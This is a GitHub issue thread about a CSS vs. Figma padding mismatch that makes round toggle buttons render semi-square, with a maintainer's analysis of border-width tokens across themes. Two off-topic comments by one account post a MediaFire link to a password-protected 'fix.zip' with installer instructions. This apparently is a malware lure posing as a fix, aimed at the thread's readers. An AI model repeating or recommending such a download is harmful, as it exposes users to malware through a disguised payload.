### ISSUE TITLE
padding difference Figma-CSS causes issues with border-radius

### ISSUE THREAD

**Issue by Diaan** [sl-design-system/components#1480]
### Provide a general summary of the issue here

In Figma the border is overlayed over the padding, in css the border is outside the padding. first we calculated the actual padding by subtracting the border-width token from the padding token to make sure the webcomponent matched the figma design.
If we don't do this calculation the button will become 2 or 4 pixels bigger when the border is set to 1 and 2 pixels respectively. When Figma has a round button that is 40px high with a 2px border it will have a border-radius of 20. In the webcomponent the height will be 44 (40px + 2 x 2px) so, then with a border-radius of 20 the button will not be completely round:
![image](https://github.com/user-attachments/assets/4cddfe1b-8097-4f8f-93f7-867e1e02d890)

### 🤔 Expected Behavior?

border-radius for round border actually makes them round

### 😯 Current Behavior

semi-square buttons 

### 🖥️ Steps to Reproduce

http://localhost:6006/?path=/story/actions-toggle-button--all&globals=theme:clickedu
(works only locally until #1478 is finished

### What browsers are you seeing the problem on? (only for bugs in code)

Chrome

### What operating system are you using?

MacOS

### 🧢 Your product/team

SLDS

### 🎨 Your Theme(s)

Sanoma Learning

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Diaan** [comment]
The problem is that the toggle button uses tokens from the `ghost` fill for the padding, but in the regular button those ghost buttons don't have a border. so the calc function is `padding - 0px` but the outline variant of the toggle button DOES have a border.
We need to differentiate between default and outline for the padding

**Comment by Diaan** [comment]
The selected colour in the SL theme is incorrect, while the token seems to be correct: 

![Image](https://github.com/user-attachments/assets/72560515-931c-455b-8b06-06a0cbde62b1)

**Comment by Diaan** [comment]
In the toggle group the fill of the toggle buttons was set to 'ghost', but this caused issues for some themes (esp. Clickedu) because there the border was set to 0 (logical, because there is no border), while in other themes the border-width of the ghost button was the same as of the other fills (for example outline), but the colour was of the border was the same as the background, so you would not see it.
This border-width is used to calculate the correct padding to end up with a 32 or 40 px button.
In the toggle-group the actual border of the toggle-button is set to 0 (so the button will be less than 32 or 40 px high) and then "replaced" by the button on the group, so it's back to its original height
If the button is already 0, the height of the button won't change, but the group-border will add extra height.

With the outline button you will always have a border-width set, so this problem won't occur.

Most themes have a border width set for the ghost button, Neon and Click Edu are the only ones that don't.
![Image](https://github.com/user-attachments/assets/1552b99b-f8ad-4494-9038-38309e5309f4)

I would suggest making this uniform to prevent surprises like this one in the future.
